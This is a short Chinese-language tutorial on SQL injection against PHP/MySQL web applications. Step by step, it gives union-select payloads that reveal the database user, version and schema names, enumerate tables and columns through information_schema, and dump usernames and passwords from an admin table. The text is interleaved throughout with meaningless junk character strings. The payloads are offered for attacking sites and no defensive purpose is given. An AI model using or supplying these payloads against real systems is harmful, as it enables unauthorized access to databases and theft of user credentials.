7 O) n3 K5 t9 B8 Q3 c p
教程内容:Mysql 5+php 注入
j& r. a+ N% A6 w- [8 y: S5 N5 j2 d' e1 W7 m) M5 }
/ ^" K1 v, J( r
! D8 S# T1 X9 e- O3 M, G# L/ P
一.查看MYSQL基本信息(库名,版本,用户)) D0 S7 ?6 { \8 B
# Y7 u9 q* ]( k7 nand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*7 v: N1 Z4 t0 b" v& k$ p
$ W3 c# o" l7 f二.查数据库8 F5 E1 L: M% ~& f
: J; t0 I2 H$ E) O U
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*; k- K H# p. P, i
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
+ T: y3 t% b" q5 J! Y2 ~
$ c5 u& k/ ]' @- }6 E8 R7 x$ E三.暴表- r r3 [' ?6 T8 A6 b1 v! Z
# @& \1 s& }( F, A( oand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
; y& v+ n- w2 ^/ V) o- G ~
4 M/ Q @ ^' t2 dlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。9 Z- K% p0 U/ c( ^3 d5 r/ `
' O) T& W7 K$ w1 Y- q: f# s; G
四.暴字段
2 W- w7 [+ ^; O' Q) ?, f N, Y, G$ ]/ o2 k) z
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*/ [3 ]1 }0 |$ `0 O1 u6 T
# N7 b* o: |2 S. V* D2 e7 h% U
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
4 Y$ z* |5 ?1 X. ]' ?3 O4 f8 A2 @/ Z3 N) w
五.暴数据0 K8 ], ?: | w, c2 Z5 _3 u: @+ J
6 T' U( w& g! H9 Wand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*9 W# s0 w/ E5 L- c% h- v. P4 s8 G O
8 K; d4 @$ j: i: ^) D1 {
% v% R6 z- ], V, ]这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。0 @9 S# c: R; P. M( Q5 X) ~6 p
|